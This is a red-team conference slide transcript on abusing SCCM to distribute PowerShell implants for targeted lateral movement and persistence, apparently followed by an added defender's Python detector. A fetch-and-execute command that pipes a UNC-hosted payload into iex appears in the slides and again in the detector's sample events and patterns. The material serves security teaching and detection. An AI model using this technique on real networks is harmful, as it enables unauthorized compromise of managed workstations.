TRANSCRIPT
Red Team Upgrades: Using SCCM for Malware Deployment
@enigma0x3
❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group
❖ Active developer on the PowerShell Empire project
❖ Offensive PowerShell advocate
❖ 2nd time speaking!
❖ This con is probably older than I am
❖ Indiana corn farmer turned h4x0r (not really)
What this is...
❖ What is SCCM and how some admins fail at securing it
❖ Ways to abuse Microsoft’s System Center Configuration Manager (SCCM) for targeted network compromise.
➢ I’m going to cover targeted, strategic use as opposed to mass pwnage
Setting the Stage
❖ This talk assumes you have RDP access to a SCCM server
❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not obtaining access to SCCM.
❖ No, having access to SCCM does not mean you own the enterprise
❖ If you administer SCCM as a domain admin, you fail.
What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts are hosted on the SCCM server
❖ Set up and maintained via an agent/server architecture
❖ Consists of a central site server with distribution points.
➢ Agents check in to the server periodically to obtain new packages/applications
❖ Basically acts as internal RAT/C2
SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups
➢ e.g. “SCCM Admins” in AD
❖ Typically set up/configured using a service account to run the application/push updates
❖ Application contents (*cough, cough install scripts and notes*) are hosted on a publicly available share
❖ Admins gonna admin
Right Click Tools
❖ Add-On that can be installed to assist in client management tasks
❖ Should be installed on a client such as an administrative workstation...not on the server
➢ Admins install it on the server anyways
❖ Enables full control of managed endpoints
Yep...
Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients
➢ Take control of the server and you have distributed workstation control
➢ SCCM agents are just waiting to run your code
❖ Live off of the land
➢ Keep your malicious implant count low, use SCCM for very targeted implant distribution
➢ Looks like normal day-to-day traffic/activity
➢ To limit the risk of getting caught, become an admin and not a typical adversary
Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets
➢ Able to push implants out in a very controlled and surgical manner
❖ Also acts as a persistence mechanism
Abusing SCCM: Hunting
❖ Some organizations have user->device mapping
➢ This allows admins to create specific groups for departments
❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic
Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for payload delivery and execution
❖ Do so by creating a PowerShell payload and throwing it up on the public share SCCM uses (typically something like sccmsource)
Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute your payload
➢ cmd.exe /c “powershell.exe -c “gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex””
❖ Deploy the application to your target group and wait for the SCCM agents to check in
➢ Payload is fetched over UNC and runs in memory
❖ More here:
➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/
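Added here as a defender's example, not code from the talk or the author's tooling: a small Python scanner over constructed process-creation records that flags the pattern above (PowerShell reading a UNC-hosted file and piping it into iex), rating the hit higher when the parent process is the SCCM agent host CcmExec.exe. The host name, share and file names in the sample events are assumed values.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields).
# Not captured from any real host; the server/share names are made up.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "powershell.exe -c "gc \\sccm01\sccmsource\AppFolder\payload.txt | iex""'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "gc \\sccm01\sccmsource\AppFolder\payload.txt | iex"'},
    {"ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i \\sccm01\sccmsource\Office\setup.msi /qn"},  # normal deployment
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},  # local script
]

UNC_PATH = re.compile(r"\\\\[\w.-]+\\[^\s\"']+")          # \\server\share\...
READ_CMDLET = re.compile(r"\b(gc|cat|type|get-content)\b", re.I)  # Get-Content and its aliases
INVOKE = re.compile(r"(\biex\b|invoke-expression)", re.I)  # Invoke-Expression and its alias
SCCM_AGENT = re.compile(r"\\ccmexec\.exe$", re.I)          # SMS Agent Host process


def classify(event):
    """Return a finding dict for the UNC-fetch-then-iex pattern, else None."""
    cmd = event["CommandLine"]
    unc = UNC_PATH.search(cmd)
    if not ("powershell" in cmd.lower() and unc
            and READ_CMDLET.search(cmd) and INVOKE.search(cmd)):
        return None
    # Spawned by the SCCM agent => consistent with a deployed script installer
    from_agent = bool(SCCM_AGENT.search(event["ParentImage"]))
    return {"severity": "high" if from_agent else "medium",
            "share": unc.group(0), "parent": event["ParentImage"]}


def scan(events):
    """Return (index, finding) pairs for every event that matches."""
    hits = []
    for idx, event in enumerate(events):
        finding = classify(event)
        if finding:
            hits.append((idx, finding))
    return hits


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```

Pairing the hit with SCCM's own deployment records (which application was deployed, by whom, to which collection) tells an analyst whether the fetch was an expected install script or an unexpected one on the share.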
Questions and Contact
❖ Feel free to hit me up!
❖ enigma0x3 [at] gmail [dot] com
❖ @enigma0x3 on Twitter and Github
❖ enigma0x3 on Freenode: #psempire
❖ Blog: enigma0x3.wordpress.com
References
❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf
❖ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/